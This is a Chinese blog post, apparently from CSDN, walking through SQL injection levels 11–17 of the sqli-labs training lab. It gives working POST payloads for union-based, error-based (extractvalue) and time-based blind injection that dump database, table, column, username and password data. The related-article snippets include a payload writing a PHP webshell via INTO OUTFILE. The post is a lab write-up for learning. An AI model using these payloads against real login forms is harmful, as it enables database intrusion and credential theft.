sqli-labs POST (11-17)

最新推荐文章于 2024-03-03 12:54:23 发布
最新推荐文章于 2024-03-03 12:54:23 发布
阅读量302 收藏
点赞数
分类专栏: CFT SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_35297930/article/details/90045987
版权

      写在前面的话:今天比较空闲,把11-17给写了,18之后的是另外一种方式了,需要改包,遂单独作为一篇了。

LESS 11
   由于是POST,与GET有一定的区别,不能直接在地址栏处构造playload,每次在输入框中构造有些难受,可以使用burpsuite或者火狐的hackbar。
在Username处输入admin’, Password 随意输,可以看到回显报错,由报错可知是单引号字符注入。
在这里插入图片描述
接下来的步骤在BP上进行。
与GET关相同,我们先判断有几个回显位。
uname=admin’ order by 3 #&passwd=admin&submit=Submit
uname=admin’ order by 2 #&passwd=admin&submit=Submit
可以看到3时报错,2是回显正常,回显位有两位。
在这里插入图片描述
在这里插入图片描述

uname=1admin’ union select 1,database() #&passwd=admin&submit=Submit
得到当前数据库名称。
在这里插入图片描述
之后用GET关的相关方法进行操作。
爆表:
uname=1admin’ union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() #&passwd=admin&submit=Submit
在这里插入图片描述
爆列:
uname=1admin’ union select 1,group_concat(column_name) from information_schema.columns where table_name =‘users’ #&passwd=admin&submit=Submit
在这里插入图片描述
爆数值:
uname=1admin’ union select group_concat(username,’’),group_concat(password,’’) from users #&passwd=admin&submit=Submit
在这里插入图片描述
LESS 12
与less11相同,只不过对于username参数的处理,需要构造成admin"),其余相同。

LESS 13
username:admin‘
password:随便
   根据回显可以判断对username的处理为admin’)。其次检查回显位时,会发现正确的执行并不回显,但错误可以回显,所以可以采用基于报错的盲注。
在这里插入图片描述
获取数据库名称:
uname=1admin’) and extractvalue(1,concat(’~’,(select database()),’~’)) # &passwd=2312&submit=Submit
在这里插入图片描述
爆表:
uname=1admin’) and extractvalue(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema =database()),’~’)) # &passwd=2312&submit=Submit
在这里插入图片描述
爆列:
uname=1admin’) and extractvalue(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_name =‘users’),’~’)) # &passwd=2312&submit=Submit
在这里插入图片描述
爆数值:
uname=1admin’) and extractvalue(1,concat(’~’,(select group_concat(username,’//’,password) from users),’~’)) # &passwd=2312&submit=Submit
在这里插入图片描述
   由于extractvalue只能查询32位数据,所以只能显示这么多,需要其他的数据可以考虑其余的盲注方法。
LESS 14
   与LESS13相同,可选用报错注入,将对username的构造改为admin“,其余不变即可。

LESS 15
   此关没有错误提示,只能用时间盲注了,和GET关相同。
uname=admin’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
   其余palyload自行构造。
   其次成功与错误的界面有点不同,主要为图片不同,可以根据图片名称不同这点写脚本。

LESS 16
与less15相同,将username的构造改为admin") 即可,其余不变。

LESS 17
   题目要求感觉是要修改密码,emmm,一样的思路,爆出数值在进行update就行,尝试对username进行构造,发现没有回显,在password处构造11’。
即:username:admin
         password:11’
至于为什么这样构造,看源码就知道了,orz。
余下进行报错注入。
uname=admin & passwd=11’ and extractvalue(1,concat(0x7e,(select database()),0x7e)) # &submit=Submit
剩余palyload与less15相同。

半夜好饿
关注
专栏目录
sqli-labs第十五和十六关(post请求-布尔盲注)
qq_42266432的博客
08-26 914
开启第十五关,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs笔记(3)post注入、报错注入、双注入
weixin_43798683的博客
04-22 287
less 11 单引号报错’’’ and password=’’ LIMIT 0,1 猜测后台语句为select ? where uname = '?' and passwd = '?' 构造' or 1 #登陆成功 那在post注入中如何获取数据库中的内容呢 根据报错内容获取内容 报错注入 函数extractvalue(key1,key2): 使用xpath语句key2,...
sqli-labs(POST类型注入)
weixin_45626840的博客
04-23 196
思路和前些关的联合注入一样,只不过payload构造和回显内容是通过抓包修改与查看
sqli-labs POST (18-22)
半夜好饿的博客
05-15 478
LESS18 随手输入username和password,可以从回显中看到,当用户名密码正确时,会有如下回显,错误时只有一个‘Your IP ADDRESS is: 127.0.0.1’ 根据提示可知是user-agent的http头注入,用bp抓包,修改user-agent,得到相关信息。框住部分为增加的playload和获取的数据库名称。 ’ and extractvalue (1,conc...
sqli-labs通关全解---POST提交方式--less11-16-5
cyynid的博客
01-11 331
POST提交
sqli-labs-master.zip
03-17
靶场的搭建过程相对简单,只需将下载的“sqli-labs-master.zip”文件解压,按照官方文档或者网络上的教程进行配置,就可以在个人虚拟环境中运行。这一步对于理解Web应用的运行环境和服务器配置也是很有帮助的。 在...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1431
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 733
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
03-03 729
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
(手工)【sqli-labs11-12】POST注入:基本步骤、示例
07-07 1407
SQL-POST注入】
sqli-labs靶场实现(三)【POST基于错误的注入(单引号、双引号)】(less-11~12、具体步骤+图文详解)
weixin_46709219的博客
12-15 832
一) 二) 三)
sqli 简单post注入
weixin_46164380的博客
02-21 186
判断当前数据库字段有几列; uname=admin' order by 2# &password=123 这个时候就出现了报错,表示字段只有两列。 uname=admin' order by 3# &password=123 判断当前用户与当前数据库 uname=admin' union select user(),database()# &password=123...
sqli-labs关卡11(基于post提交的单引号闭合的字符型注入)通关思路
zyh1588的博客
11-06 613
小白回顾sqli-labs靶场第十一关
sqli-labs Less-11~16(sqli-labs闯关指南 11—16)--POST注入相关
m0_54899775的博客
12-18 1587
sqli-labs Less-11~16(sqli-labs闯关指南 11—16)--POST注入相关 Less-11和Less-12都为基于错误的POST类型的字符型注入;Less-13和Less-14都为基于错误的POST类型的盲注;Less-15和Less-16都为基于错误的POST类型的延时注入
sqli-labs靶场11-12关(基于POST联合查询)
qq_46527080的博客
12-12 622
1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那么这里是典型的POST注入,那么注入点就是在POST数据中,而POST请求往往代表着用户向服务器提交了大量的数据请求,行为有包括文件上传,表单提交,按钮时间,这里分析是用户的登陆动作,那么肯定要对输入的用户名和密码带入数据库进行查询,接下来我们就把提交的用户名和密码直接替换成我们的测试语句; 1:这里我们可以使用burpsuite和hackbar都可以完成测试,这里我们选择使用Bu
sqli-11 基于post提交注入
告白的博客
07-10 274
0x00 GET与POST提交方式的不同 get是将提交信息展现在url中提交,是我们能够直接看到的,而post提交方式是将信息在数据包中传递,post提交通过将表单内容各个字段放在html header中传递我们用户无法看到传递过程,get是向服务器获取数据的形式,而post则是向服务器传递数据,get传送的数据量较小,不能大于2KB。 post传送的数据量较大,一般被默认为不受限制。get提交比较起来比post方便,但是post提交方式比get更加的安全稳固,重点需要理解post提交方式用户提交的信息
【less-11】基于SQLI的POST字符型SQL注入
未名编程
07-17 547
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 基于SQLI的POST字符型SQL注入 实验目的 通过本实验理解区别SQL注入中GET和POST的区别,掌握POSTSQL注入漏洞的手工注入方法,熟悉Burpsuite软件的使用。 实验环境 渗透平台:Kali 目标网站:SQLI平台上的Less-11 实验原理 1.POST方式概述 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。 2.GET和POST的区别: 语义上的区别,get用于.
sqli-labs第十七关
yuqnqi的博客
05-09 304
查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试。
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入的基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值